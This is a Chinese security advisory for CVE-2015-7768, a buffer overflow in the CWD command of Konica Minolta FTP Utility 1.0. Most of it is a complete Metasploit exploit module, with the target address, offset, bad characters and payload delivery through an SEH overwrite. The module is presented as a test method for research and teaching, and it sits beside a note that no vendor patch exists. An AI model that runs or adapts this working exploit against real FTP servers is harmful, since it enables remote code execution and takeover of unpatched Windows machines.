Konica Minolta FTP Utility缓冲区溢出漏洞(CVE-2015-7768)
发布日期:2015-09-11
更新日期:2015-10-10
受影响系统:
描述:
CVE(CAN) ID: CVE-2015-7768
KONICA MINOLTA FTP Utility是KONICA MINOLTA复印机使用的一个软件,可以把扫描的软件直接传到电脑里面。
Konica Minolta FTP Utility 1.0在解析CWD命令时,检查输入大小失败,在实现上存在缓冲区溢出漏洞,远程攻击者通过较长的CWD命令,利用此漏洞可执行任意代码。
<*来源:Shankar Damodaran
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Shankar Damodaran ()提供了如下测试方法:
##
# This module requires Metasploit:
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EBD', '37908' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1500,
'BadChars' => "\x00\x0a\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 SP1 x86',
{
'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
'Offset' => 1037
}
]
],
'DisclosureDate' => 'Aug 23 2015',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
connect_login
buf = rand_text(target['Offset'])
buf << generate_seh_record(target.ret)
buf << payload.encoded
buf << rand_text(3000)
print_status("Sending exploit buffer...")
send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
handler
disconnect
end
end
建议:
厂商补丁:
konicaminolta
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: